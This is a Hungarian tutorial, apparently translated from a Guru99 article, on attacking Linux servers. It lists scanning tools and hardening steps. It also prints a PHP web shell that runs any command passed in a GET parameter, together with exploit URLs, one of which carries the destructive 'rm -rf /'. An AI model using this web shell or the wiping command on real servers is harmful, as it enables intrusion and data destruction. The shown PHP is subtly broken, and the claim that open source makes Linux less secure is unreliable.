Hacking Linux OS:

A Linux a legszélesebb körben használt szerver operációs rendszer, különösen webszerverek esetében. Nyílt forráskódú, ez azt jelenti, hogy bárki hozzáférhet a forráskódhoz. Emiatt kevésbé biztonságos más operációs rendszerekhez képest, mivel a támadók tanulmányozhatják a forráskódot, hogy sebezhetőségeket találjanak. A Linux for Hackers arról szól, hogy ezeket a sebezhetőségeket kihasználva jogosulatlan hozzáférést szerezzenek a rendszerhez.

Ebben a cikkben bemutatjuk, hogy mi a Linux, a biztonsági sebezhetőségeit, a hackelés az Ubuntuval és az ellenintézkedéseket, amelyeket bevethet.

A bemutatóban tárgyalt témák

  • Gyors megjegyzés a Linuxról
  • Linux hacker eszközök
  • Hogyan lehet megelőzni a Linux hackeléseket
  • Hacking tevékenység: Gyors megjegyzés a Linuxról

    A Linux egy nyílt forráskódú operációs rendszer

Gyors megjegyzés a Linuxról

A Linux egy nyílt forráskódú operációs rendszer. Számos Linux-alapú operációs rendszer disztribúciója létezik, mint például a Redhat, Fedora, Ubuntu stb. Más operációs rendszerekkel ellentétben a Linux kevésbé biztonságos, ha a biztonságról van szó. Ennek oka, hogy a forráskód szabadon hozzáférhető, így a nem nyílt forráskódú operációs rendszerekhez képest könnyen tanulmányozhatók a sebezhetőségek és kihasználhatók. A Linux használható szerver, asztali számítógép, táblagép vagy mobileszköz operációs rendszerként.

A Linux programokat GUI vagy parancsok segítségével lehet működtetni. A Kali Linux hackeléshez használt Linux parancsok hatékonyabbak és hatékonyabbak a GUI használatához képest. Emiatt segít az alapvető Linux-parancsok ismerete a hackeléshez.

Tekintse meg ezeket az útmutatókat https://www.guru99.com/unix-linux-tutorial.html arról, hogyan kezdjen hozzá a Kali Linux hackeléshez.

Linux Hacking Tools

  • Nessus- ez az eszköz használható Ubuntu hackeléshez, a konfigurációs beállítások, javítások és hálózatok stb. átvizsgálásához. megtalálható a https://www.tenable.com/products/nessus
  • NMap címen. Ez az eszköz a szerveren futó hosztok és az általuk használt szolgáltatások megfigyelésére használható. Portok keresésére is használható. Megtalálható a https://nmap.org/
  • SARA – A SARA a Security Auditor’s Research Assistant rövidítése. Ahogy a neve is mutatja, ez az eszköz a hálózatok auditálására használható olyan fenyegetésekkel szemben, mint az SQL Injection, XSS stb. megtalálható a http://www-arc.com/sara/sara.html

A fenti lista nem teljes, csak képet ad az Ubuntu hackeléséhez és a Linux rendszerek feltöréséhez rendelkezésre álló eszközökről.

Hogyan lehet megelőzni a Linux hackelést

A Linux hackelés kihasználja az operációs rendszer sebezhetőségeit. Egy szervezet az ilyen támadások elleni védelem érdekében a következő irányelveket fogadhatja el.

  • Javításkezelés – a javítások kijavítják azokat a hibákat, amelyeket a támadók kihasználva kompromittálják a rendszert. Egy jó javításkezelési politika biztosítja, hogy folyamatosan alkalmazza a megfelelő javításokat a rendszerre.
  • Az operációs rendszer megfelelő konfigurációja- más kihasználások a kiszolgáló konfigurációjának gyengeségeit használják ki. Az inaktív felhasználóneveket és daemonokat le kell tiltani. Az alapértelmezett beállításokat, például az alkalmazásokhoz tartozó közös jelszavakat, az alapértelmezett felhasználóneveket és egyes portszámokat meg kell változtatni.
  • Behatolásérzékelő rendszer- ilyen eszközökkel fel lehet fedezni a rendszerhez való illetéktelen hozzáférést. Egyes eszközök képesek az ilyen támadások észlelésére és megelőzésére.

Hacking Activity: Ubuntu Linux rendszer feltörése PHP használatával

Ebben a gyakorlati forgatókönyvben megtanuljuk, hogyan lehet Ubuntuval hackelni, és alapvető információkat adunk arról, hogyan lehet a PHP segítségével kompromittálni egy Linuxot. Nem fogunk semmilyen áldozatot megcélozni. Ha ki akarod próbálni, telepítheted a LAMPP-et a helyi gépedre.

A PHP két olyan funkcióval rendelkezik, amelyekkel Linux hacker parancsokat lehet végrehajtani. Rendelkezik az exec() és a shell_exec() függvényekkel. Az exec() függvény a parancs kimenetének utolsó sorát adja vissza, míg a shell_exec() a parancs teljes eredményét adja vissza stringként.

A szemléltetés kedvéért tegyük fel, hogy a támadó menedzserek a következő fájlt akarják feltölteni egy webszerverre.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

ITT,

A fenti szkript a parancsot a cmd nevű GET változóból kapja. A parancsot a shell_exec() segítségével hajtja végre, és az eredményt visszaküldi a böngészőbe.

A fenti kódot a következő URL segítségével lehet kihasználni:

http://localhost/cp/konsole.php?cmd=ls%20-l

ITT,

  • “…konsole.php?cmd=ls%20-l “a cmd változóhoz az ls -l értéket rendeli.

Az Ubuntuban a szerver elleni hackelés parancsát a következőképpen hajtja végre:

shell_exec('ls -l') ;

A fenti kódot egy webkiszolgálón végrehajtva a következőhöz hasonló eredményt kapunk.

A fenti parancs egyszerűen megjeleníti az aktuális könyvtárban lévő fájlokat és azok jogosultságait

Tegyük fel, hogy a támadó a következő parancsot adja át

rm -rf /

ITT,

  • Az “rm” eltávolítja a fájlokat
  • Az “rf” az rm parancsot rekurzív módban futtatja. Az összes mappa és fájl törlése
  • “/” utasítja a parancsot, hogy a fájlok törlését a gyökérkönyvtárból kezdje el

A támadási URL valahogy így nézne ki

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Összegzés

  • A Linux egy népszerű operációs rendszer szerverek, asztali számítógépek, táblagépek és mobil eszközök számára.
  • A Linux nyílt forrású, a forráskód bárki számára hozzáférhető. Ez megkönnyíti a sebezhetőségek kiszűrését. Ez az egyik legjobb operációs rendszer a hackerek számára.
  • Az Ubuntuban található alapvető és hálózati hackelési parancsok értékesek a Linux hackerek számára.
  • A sebezhetőségek olyan gyengeségek, amelyeket ki lehet használni egy rendszer kompromittálására.
  • A jó biztonság segíthet megvédeni egy rendszert attól, hogy egy támadó veszélybe kerüljön.

Vélemény, hozzászólás?

Az e-mail-címet nem tesszük közzé.